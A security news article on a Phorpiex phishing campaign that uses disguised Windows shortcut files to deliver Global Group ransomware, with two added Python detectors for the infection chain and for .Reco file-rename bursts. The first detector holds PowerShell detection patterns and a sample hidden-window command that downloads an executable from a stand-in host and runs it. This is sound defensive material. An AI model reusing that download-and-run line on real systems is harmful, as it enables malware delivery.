    Phorpiex Phishing Delivers Low-Noise Global Group Ransomware

    A high-volume phishing campaign delivering the long-running Phorpiex malware has been observed using emails with the subject line “Your Document,” a lure widely seen throughout 2024 and 2025.

    The messages include an attachment that appears to be a harmless document but is actually a weaponised Windows Shortcut file designed to initiate a multi-stage infection chain.

    According to a new advisory by Forcepoint, the campaign highlights the continued effectiveness of Windows shortcut (.lnk) files as an initial access vector and their role in delivering Global Group ransomware, a stealthy, offline-capable ransomware-as-a-service (RaaS) operation.

    Why Windows Shortcut Lures Persist

    Windows shortcut files remain a reliable way to convert a single click into code execution. Attackers disguise the files using double extensions such as Document.doc.lnk and take advantage of the Windows default setting that hides known file extensions.

    Visual cues also play a role, with icons copied from legitimate Windows resources to reinforce the illusion of a trusted document.

    Once opened, the shortcut launches cmd.exe, which in turn runs PowerShell to download and execute a second-stage payload. No installer is displayed and no obvious warning is shown to the user, allowing the process to run quietly in the background.

    The infection chain unfolds in a straightforward but effective sequence:

    • A phishing email presents a document-looking attachment

    • The shortcut executes embedded commands via cmd.exe

    • PowerShell downloads a remote payload and saves it as windrv.exe

    • The binary is executed locally without visible user prompts
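    The chain above maps directly onto process-creation telemetry. The following is an added example, not code from Forcepoint's advisory, showing how a defender can flag it: it checks attachment names for the double-extension .lnk trick and hunts Sysmon-style process events for a PowerShell process whose ancestry is explorer.exe -> cmd.exe and whose command line downloads and runs an executable from a user-writable path. The field names follow the Sysmon Event ID 1 convention; the sample events, process ids, paths and the example.invalid host are constructed for illustration, and the drop path for windrv.exe is an assumption.

```python
import ntpath
import re

# Cues commonly present in download-and-run PowerShell one-liners.
DOWNLOAD_CUES = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
EXEC_CUES = re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.IGNORECASE)
# Directories writable without elevation; a freshly downloaded .exe launched from here is a strong cue.
USER_WRITABLE = re.compile(r"\\(Users\\Public|Users\\[^\\]+\\AppData|Windows\\Temp|Temp)\\", re.IGNORECASE)
EXE_PATH = re.compile(r"[A-Za-z]:\\[^\s'\"]+\.exe", re.IGNORECASE)
# Document-looking double extensions ending in .lnk (the article's example is Document.doc.lnk).
DOUBLE_EXT_LNK = re.compile(r"\.(doc|docx|pdf|xls|xlsx|ppt|pptx|txt)\.lnk$", re.IGNORECASE)

# Constructed process-creation events (not real telemetry). Field names follow the
# Sysmon Event ID 1 convention; pids, paths and the example.invalid host are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 10, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -w hidden -c "..."'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                     "'http://example.invalid/x', 'C:\\Users\\Public\\windrv.exe'); "
                     "Start-Process 'C:\\Users\\Public\\windrv.exe'\"")},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": r"C:\Users\Public\windrv.exe",
     "CommandLine": "windrv.exe"},
    # Benign: an administrator opens a prompt from Explorer and runs a local script.
    {"ProcessId": 600, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": 500, "ParentProcessId": 600,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1"},
]


def is_double_extension_lnk(filename):
    """True for attachment names such as Document.doc.lnk that masquerade as documents."""
    return DOUBLE_EXT_LNK.search(filename) is not None


def _basename(path):
    return ntpath.basename(path).lower()


def _ancestry(by_pid, pid, depth=4):
    """Image basenames from a process up through its ancestors, nearest first."""
    chain = []
    while pid in by_pid and len(chain) < depth:
        chain.append(_basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def find_lnk_download_chains(events):
    """Flag PowerShell processes whose ancestry and command line match the
    explorer.exe -> cmd.exe -> PowerShell -> download -> run pattern."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    children = {}
    for ev in events:
        children.setdefault(ev["ParentProcessId"], []).append(ev)

    findings = []
    for ev in events:
        if _basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        if _ancestry(by_pid, ev["ProcessId"])[1:3] != ["cmd.exe", "explorer.exe"]:
            continue
        cmdline = ev.get("CommandLine", "")
        reasons = ["explorer.exe -> cmd.exe -> PowerShell ancestry (typical of a .lnk launch)"]
        if DOWNLOAD_CUES.search(cmdline):
            reasons.append("download cue in PowerShell command line")
        if EXEC_CUES.search(cmdline):
            reasons.append("execution cue in PowerShell command line")
        for path in sorted(set(EXE_PATH.findall(cmdline))):
            if USER_WRITABLE.search(path):
                reasons.append(f"executable dropped to user-writable path: {path}")
        for child in children.get(ev["ProcessId"], []):
            if USER_WRITABLE.search(child["Image"]):
                reasons.append(f"PowerShell spawned {_basename(child['Image'])} from a user-writable path")
        # Ancestry alone is noisy (admins open shells from Explorer): require a payload cue too.
        if len(reasons) > 1:
            findings.append({"pid": ev["ProcessId"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for attachment in ("Document.doc.lnk", "Report.docx"):
        print(attachment, "->", "BLOCK" if is_double_extension_lnk(attachment) else "allow")
    for finding in find_lnk_download_chains(SAMPLE_EVENTS):
        print(f"pid {finding['pid']}:")
        for reason in finding["reasons"]:
            print("  -", reason)
```

    The ancestry test on its own would fire on every administrator who opens a prompt from the desktop, so the detector only reports a PowerShell process that also carries a download cue, an execution cue, or an executable dropped to or launched from a user-writable directory; the benign backup script in the sample is therefore left alone while the windrv.exe chain is reported with all five cues.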

    The payload retrieved in this campaign is associated with Phorpiex, a modular malware-as-a-service (MaaS) botnet active since around 2010 and commonly used to distribute ransomware and other secondary malware.

    Read more on phishing-delivered ransomware: Russian Phishing Campaign Delivers Phantom Stealer Via ISO Files

    Global Group’s Offline Ransomware Model

    In this case, Phorpiex ultimately deployed Global Group ransomware, which differs from many modern families by operating entirely offline.

    The malware generated encryption keys locally, did not contact a command-and-control (C2) server and performed no data exfiltration.

    This design allowed it to function in isolated or air-gapped environments and reduced reliance on network traffic that might otherwise trigger alerts.

    The ransomware encrypted files using the ChaCha20-Poly1305 algorithm and appended the .Reco extension. A ransom note titled README.Reco.txt was dropped across the system, while the desktop wallpaper was replaced with a GLOBAL GROUP message.

    The malware also deleted itself after execution and removed shadow copies, complicating forensic analysis and recovery.
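    Because this ransomware generates its keys locally and never talks to a C2 server, network monitoring offers little, and host file-system telemetry becomes the main detection surface. The following is an added example, not code from Forcepoint or the Global Group operators, that triages file events for the indicators named above: a burst of renames to the .Reco extension inside a short window and README.Reco.txt notes appearing across directories. The events, timestamps and paths are constructed, and the 20-renames-in-60-seconds threshold is an assumed tuning value rather than anything the advisory specifies.

```python
import ntpath
from collections import deque
from datetime import datetime, timedelta

RANSOM_EXT = ".Reco"              # extension appended to encrypted files
RANSOM_NOTE = "readme.reco.txt"   # ransom note name, compared case-insensitively


def _build_sample_events():
    """Constructed file-system events (not real telemetry): (ISO timestamp, operation, path)."""
    base = datetime(2025, 1, 1, 10, 5, 0)
    dirs = [r"C:\Users\alice\Documents", r"C:\Users\alice\Pictures"]
    events = [
        # Ordinary activity earlier in the day.
        ("2025-01-01T09:00:00", "create", r"C:\Users\alice\Documents\draft.docx"),
        ("2025-01-01T09:30:00", "rename", r"C:\Users\alice\Documents\draft-v2.docx"),
    ]
    # 30 files renamed with the .Reco extension at one-second intervals.
    for i in range(30):
        path = ntpath.join(dirs[i % 2], f"file{i:02d}.docx{RANSOM_EXT}")
        events.append(((base + timedelta(seconds=i)).isoformat(), "rename", path))
    # Ransom notes dropped in several directories once encryption finishes.
    for d in dirs + [r"C:\Users\alice\Desktop"]:
        note = ntpath.join(d, "README.Reco.txt")
        events.append(((base + timedelta(seconds=30)).isoformat(), "create", note))
    return events


SAMPLE_FS_EVENTS = _build_sample_events()


def triage_fs_events(events, window_seconds=60, threshold=20):
    """Return ransomware indicators: the number of .Reco renames, the time a burst
    (>= threshold renames within window_seconds) was first seen, and the
    directories in which a ransom note was created."""
    window = deque()
    encrypted = 0
    burst_at = None
    note_dirs = set()
    for ts_str, op, path in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        name = ntpath.basename(path).lower()
        if op == "create" and name == RANSOM_NOTE:
            note_dirs.add(ntpath.dirname(path))
        elif op == "rename" and name.endswith(RANSOM_EXT.lower()):
            encrypted += 1
            window.append(ts)
            # Drop renames older than the sliding window before testing the threshold.
            while (ts - window[0]) > timedelta(seconds=window_seconds):
                window.popleft()
            if burst_at is None and len(window) >= threshold:
                burst_at = ts_str
    return {"encrypted_count": encrypted, "burst_at": burst_at, "note_dirs": sorted(note_dirs)}


if __name__ == "__main__":
    result = triage_fs_events(SAMPLE_FS_EVENTS)
    print(f"encrypted files: {result['encrypted_count']}")
    print(f"rename burst first seen: {result['burst_at']}")
    for d in result["note_dirs"]:
        print(f"ransom note in: {d}")
```

    The burst timestamp is the value worth acting on: with shadow copies removed and the binary deleting itself, the window between the first rename burst and the last encrypted file is the only moment at which isolating the host still limits loss, so the detector reports the first time the threshold is crossed rather than waiting for the note to appear.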

    “This campaign demonstrates how long-standing malware families like Phorpiex remain highly effective when paired with simple but reliable phishing techniques,” Forcepoint said.

    “By exploiting familiar file types such as Windows shortcut files, attackers can gain initial access with minimal friction, enabling a smooth transition to high-impact payloads like Global Group ransomware.”
